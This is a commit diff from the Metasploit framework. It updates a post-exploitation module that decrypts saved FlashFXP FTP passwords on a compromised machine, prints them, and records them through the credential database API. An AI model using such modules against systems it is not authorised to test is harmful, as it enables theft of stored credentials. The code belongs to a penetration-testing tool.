Merge branch 'feature/MSP-9732/flashfxp' into staging/electro-release
commit
a7416332e3
|
@ -84,19 +84,32 @@ class Metasploit3 < Msf::Post
|
|||
passwd = decrypt(epass)
|
||||
|
||||
print_good("*** Host: #{host} Port: #{port} User: #{username} Password: #{passwd} ***")
|
||||
if session.db_record
|
||||
source_id = session.db_record.id
|
||||
else
|
||||
source_id = nil
|
||||
end
|
||||
report_auth_info(
|
||||
:host => host,
|
||||
:port => port,
|
||||
:sname => 'ftp',
|
||||
:source_id => source_id,
|
||||
:source_type => "exploit",
|
||||
:user => username,
|
||||
:pass => passwd)
|
||||
service_data = {
|
||||
address: Rex::Socket.getaddress(host),
|
||||
port: port,
|
||||
protocol: "tcp",
|
||||
service_name: "ftp",
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :session,
|
||||
session_id: session_db_id,
|
||||
post_reference_name: self.refname,
|
||||
username: username,
|
||||
private_data: passwd,
|
||||
private_type: :password
|
||||
}
|
||||
|
||||
credential_core = create_credential(credential_data.merge(service_data))
|
||||
|
||||
login_data = {
|
||||
core: credential_core,
|
||||
access_level: "User",
|
||||
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||
}
|
||||
|
||||
create_credential_login(login_data.merge(service_data))
|
||||
end
|
||||
rescue
|
||||
print_status("Either could not find or could not open file #{filename}")
|
||||
|
|
Loading…
Reference in New Issue